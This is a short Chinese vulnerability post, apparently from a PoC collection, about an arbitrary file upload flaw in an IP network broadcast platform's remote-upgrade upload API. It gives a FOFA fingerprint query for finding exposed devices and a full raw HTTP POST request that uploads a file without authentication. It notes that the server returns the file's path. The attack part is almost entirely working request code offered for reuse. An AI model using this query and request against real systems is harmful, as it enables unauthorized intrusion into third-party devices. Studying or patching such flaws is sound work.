IP网络广播服务平台upload接口存在任意文件上传漏洞

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

漏洞描述

数字化IP网络广播系统------时尚版 产品介绍 数字化IP网络公共广播,是将模拟音频信号数字编码,通过网络传输后,再由终端解码成模拟音频信号。IP网络广播服务平台upload接口存在任意文件上传漏洞。

fofa查询语句

复制代码
icon_hash="-568806419"

漏洞复现

poc

复制代码
POST /api/v2/remote-upgrade/upload HTTP/1.1
Host: xx.xx.xx.xx
User-Agent:Mozilla/4.0(compatible; MSIE 8.0;Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept:*/*
Connection: close
Content-Length: 189
Content-Type: multipart/form-data; boundary=fd28d43e5403842fb95afb8b8c86e976

--fd28d43e5403842fb95afb8b8c86e976
Content-Disposition: form-data; name="file"; filename="1.txt"
Content-Type: application/octet-stream

testtest
--fd28d43e5403842fb95afb8b8c86e976--

会返回上传文件路径:

相关推荐
我是小bā吖1 小时前
阿里云服务网格ASM实践
网络·阿里云·云计算·服务发现
吴free2 小时前
mac电脑wireshark快速实现http接口抓包
网络·测试工具·http·wireshark
浩浩测试一下2 小时前
渗透信息收集- Web应用漏洞与指纹信息收集以及情报收集
android·前端·安全·web安全·网络安全·安全架构
艾希逐月2 小时前
TCP数据的发送和接收
服务器·网络·tcp/ip
Fortinet_CHINA4 小时前
工业网络安全新范式——从风险可见性到量化防御的进化
安全·web安全
D-海漠5 小时前
Modbus_TCP_V4 客户端
网络
虚!!!看代码6 小时前
【Sentinel学习】
网络·sentinel
liulilittle6 小时前
VGW 虚拟网关用户手册 (PPP PRIVATE NETWORK 基础设施)
开发语言·网络·c++·网关·智能路由器·路由器·通信
网硕互联的小客服6 小时前
服务器如何配置防火墙规则以阻止恶意流量和DDoS攻击?
服务器·网络·ddos
Qiq9226 小时前
怎么分析内网ipv6和ipv4流量占比?
网络